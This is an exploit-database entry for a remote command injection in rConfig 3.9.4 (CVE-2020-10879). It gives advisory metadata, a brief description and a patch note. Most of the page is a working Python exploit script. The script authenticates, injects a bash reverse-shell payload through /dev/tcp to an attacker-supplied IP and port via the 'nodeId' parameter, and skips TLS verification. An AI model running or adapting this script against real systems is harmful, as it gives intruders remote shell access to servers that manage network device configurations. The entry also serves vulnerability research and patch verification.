rConfig 3.9.4 - 'search.crud.php' Remote Command Injection

vendor:

rConfig

by:

Matthew Aberegg, Michael Burkey

9.8

CVSS

CRITICAL

Remote Command Injection

CWE

Product Name: rConfig

Affected Version From: 3.9.4

Affected Version To: 3.9.4

Patch Exists: YES

Related CWE: CVE-2020-10879

CPE: a:rconfig:rconfig

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Cent OS 7 (1908)

2020

rConfig 3.9.4 – ‘search.crud.php’ Remote Command Injection

rConfig 3.9.4 is vulnerable to a remote command injection vulnerability due to insufficient sanitization of user-supplied input. An attacker can exploit this vulnerability by sending a malicious payload to the 'search.crud.php' page via the 'nodeId' parameter. This will allow the attacker to execute arbitrary commands on the vulnerable system.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of rConfig.

Source

Exploit-DB raw data:

# Exploit Title: rConfig 3.9.4 - 'search.crud.php' Remote Command Injection
# Date: 2020-03-21
# Exploit Author: Matthew Aberegg, Michael Burkey
# Vendor Homepage: https://www.rconfig.com
# Software Link: https://www.rconfig.com/downloads/rconfig-3.9.4.zip
# Version: rConfig 3.9.4
# Tested on: Cent OS 7 (1908)
# CVE: CVE-2020-10879

#!/usr/bin/python3

import requests
import sys
import urllib.parse
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

if len(sys.argv) != 6:
    print("[~] Usage : https://rconfig_host, Username, Password, Attacker IP, Attacker Port")
    exit()

host = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
attacker_ip = sys.argv[4]
attacker_port = sys.argv[5]

login_url = host + "/lib/crud/userprocess.php"
payload = "|| bash -i >& /dev/tcp/{0}/{1} 0>&1 ;".format(attacker_ip, attacker_port)
encoded_payload = urllib.parse.quote_plus(payload)


def exploit():
    s = requests.Session()

    res = s.post(
        login_url,
        data={
            'user': username,
            'pass': password,
            'sublogin': 1
        },
        verify=False,
        allow_redirects=True
    )

    injection_url = "{0}/lib/crud/search.crud.php?searchTerm=test&catId=2&numLineStr=&nodeId={1}&catCommand=showcdpneigh*.txt&noLines=".format(host, encoded_payload)
    res = s.get(injection_url, verify=False)

    if res.status_code != 200:
        print("[~] Failed to connect")


if __name__ == '__main__':
    exploit()